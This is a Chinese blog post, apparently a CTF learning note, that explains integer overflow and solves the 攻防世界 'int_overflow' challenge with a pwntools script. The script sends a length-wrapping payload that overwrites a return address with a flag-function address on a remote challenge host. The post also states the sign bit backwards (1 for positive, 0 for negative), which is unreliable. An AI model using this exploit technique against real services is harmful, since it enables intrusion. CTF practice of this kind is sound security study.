整数溢出

最新推荐文章于 2020-12-15 21:59:12 发布
最新推荐文章于 2020-12-15 21:59:12 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: Pwn学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46436680/article/details/105874679
版权

整数分为有符号和无符号两种类型,有符号数以最高位作为其符号位,即正整数最高位为1,负数为0,无符号数取值范围为非负数,常见各类型占用字节数如下:
在这里插入图片描述
当程序中的数据超过其数据类型的范围,则会造成溢出,整数类型的溢出被称为整数溢出。
参考文献:https://wiki.x10sec.org/pwn/integeroverflow/intof/
例题:攻防世界(int_overflow)
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
v3字符串的长度可以是4-8个字符,也可以是260-264个字符,接下来查看如何利用此漏洞。
在这里插入图片描述
在这里插入图片描述

from pwn import *
io=remote('111.111.111.23',26874)
# flag地址
flag_addr = 0x0804868B
# 构建payload范围在260-264
p = 0x14 * "a" + 4 * "A" + p32(flag_addr) + "a" * 234
io.sendlineafter("Your choice:", "1")
io.sendlineafter("your username:", "2")
io.recvuntil("your passwd:")
io.sendline(p)
io.recv()
io.interactive()
叁年_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
整数溢出1
08-08
整数溢出原理:由于整数在内存里面保存在一个固定长度 (在本章中使用32位)的空间内,它能存储的最大值就是固定的,当尝试去存储一个数,而这个数又大于这个固定的最大
ERC20智能合约整数溢出系列漏洞披露
10-16
【ERC20智能合约整数溢出系列漏洞披露】揭示了智能合约在区块链安全领域面临的严峻挑战。自2016年的The DAO事件以来,智能合约已成为安全问题的热点,其中包括了诸如BEC、BAI、EDU等多个案例,最近EOS的漏洞也展示了...
c语言 计算器_C语言学习日记(8)——整数溢出
weixin_39714835的博客
11-22 485
小时候喜欢玩电子计算器,觉得很神奇,想要算什么数,立刻就能算出来。当时看着计算器的液晶屏幕就想,如果算一个很大的数,超过了屏幕上面数字的位数,会怎么样呢?试了以后结果是INF,那就是无穷大了。虽然当时还小,但好像也知道那是电子计算器位数不足,从此觉得计算机虽然神奇,但计算能力也是有限的。同样,计算机虽然计算能力强大,但计算能力也受位数的限制,并不是无穷的。以int类型为例,当我们定义一个int类型...
简单的整数溢出
KKABqN
03-25 3189
文章目录0x01为什么会存在整数溢出0x02 整数溢出原理0x03 整数溢出例子分解一、截断二、有(无)符号数之间的转换三、有(无)符号的四则运算0x03 实战0x04 附录0x05 尾记 0x01为什么会存在整数溢出 回答这个问题前,我们需要了解下整数在计算机的存储方式。在计算机中,因为二值逻辑,只有开和关(通电、断电)来表示两种状态,这刚好与"0"、"1"相对应,因此在存储单元都是以0和1来.........
整数溢出的问题
purerain的专栏
03-18 1143
整数溢出问题  。如果整数太打,超出了整数类型的范围会怎么样呢?下面的程序分别从符号类型和无符号类型整数设置为最大允许值加略打一些的值,看结果是什么?下面一段程序 #includeint main(void){ int i=2147483647; unsigned int j=4294967295; printf("%d/n%d/n%d/n",i,i+1,i+2); printf("%
整数溢出问题——讲的不错
aixiaolin的专栏
03-16 2128
C语言为编程者提供了三种不同长度的整数:short int、int和long int,但不管是哪种类型表示的整数总有一定的范围,越出该范围时称为整数溢出。例如现有算法要求如下:求满足条件1+2+3+…+n≤32767的最大整数n,请考察如下程序段: int n=1,sum=0; while(sum printf(“n=%d\n”,n-1); 乍看该程序时无错误,但事实上,上列程序中的wh
Java练习笔记(1)——整数为什么会溢出&判断整数溢出异常的方法
qq_42351519的博客
12-15 1029
整数为什么会溢出 1. 计算机中的整数如何存储? 我们知道计算机中的符号化是根据ASCALL码来映射的。而计算机中的符合映射的基础是0和1. 即,符合在计算机中有对应的01序列。而0和1的序列组合的基础是二进制,因此,当我们想存 储整数在计算机内存中时,一般是将10进制的整数转换为二进制的01序列进行存储的。 2.整型数据类型和二进制的关系是什么? 该问题将让我们对整型的存储有所了解。 首先,我们知道整型数据类型有4个字节组成,一个字节是8个比特,一个比特即为一个01序列中的位, 那么我们知道整
基于整型变量一致化的整数溢出检测 (2008年)
04-25
在研究整数溢出产生原因的基础上,提出基于整型变量一致化处理且面向软件源代码整数溢出的检测方法。该方法将整数溢出检测问题抽象为1个多元不等式组求解的问题,用以解决上下文环境对整数溢出检测的影响。实例分析...
用于检测整数溢出到缓冲区溢出漏洞的高效动态跟踪技术
03-07
用于检测整数溢出到缓冲区溢出漏洞的高效动态跟踪技术
C++整数溢出的例子
10-23
一个程序例子 适用于刚开始学习C++学习的同学
Google Chrome Skia整数溢出漏洞
05-05
Google Chrome Skia整数溢出漏洞
PHP5.2下chunk_split()函数整数溢出漏洞 分析
10-30
但是,在处理畸形参数时,该函数存在整数溢出漏洞。 chunk_split() 函数的实现位于 ext/standard/string.c 文件中,函数的签名为: ```c char *php_chunk_split(char *src, int srclen, char *end, int endlen, int...
valgrind-extend:基于Valgrind的检测整数溢出、整形符号转换错误的插件
05-17
#Valgrind简介 Valgrind是一套Linux下,开放源代码(GPL V2)的仿真调试工具的集合, 用于Linux程序的内存调试和代码剖析。Valgrind由内核(core)以及基 于内核的其他调试工具组成。内核类似于一个框架(framework...
Linux kernel ip_setsockopt()整数溢出漏洞.pdf
09-07
《Linux内核ip_setsockopt()整数溢出漏洞详解》 Linux内核中的ip_setsockopt()函数是网络编程中的关键部分,负责处理IP套接字选项。然而,在特定版本的Linux内核中,该函数存在一个整数溢出漏洞,这为远程攻击者...
基于代币智能合约整数溢出漏洞的建模与验证
07-07
针对代币智能合约的安全问题,提岀一种基于代币智能合约整数溢岀漏洞的形式化建模与验证方法。分析现有Thedao和BEC等漏洞攻击...实验结果表明,该方法能成功找岀代币智能合约的整数溢出漏洞,并且具有较强的通用性。
C语言的整型溢出问题
嵌入式Linux
04-22 4515
整型溢出有点老生常谈了,bla, bla, bla… 但似乎没有引起多少人的重视。整型溢出会有可能导致缓冲区溢出,缓冲区溢出会导致各种黑客攻击,比如最近OpenSSL的heartbleed事件,就是一个buffer overread的事件。在这里写下这篇文章,希望大家都了解一下整型溢出,编译器的行为,以及如何防范,以写出更安全的代码。 什么是整型溢出 C语言的整型问题相信大家并不陌生了。对于整
c语言中整数溢出的概念
Ycx_lq的博客
12-24 4372
在编写程序时,如果整数的值太大,超出了所定义的整数类型的范围会怎么样? 下面分别将有符号类型好无符号类型整数设置为最大允许值加略大一些的值,看一看结果是是什么。    //printf函数使用%u说明符显示unsigned  int类型的值 程序段 #include int main(void) {        int   i  =    2147483647;    
appscan整数溢出漏洞修复
最新发布
06-09
整数溢出漏洞是一种非常常见的安全漏洞,可以通过以下几种方式来修复: 1. 使用无符号整数:在代码中使用无符号整数,这样可以避免整数溢出问题。 2. 检查输入参数:在处理输入参数时,对输入参数进行检查和验证,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值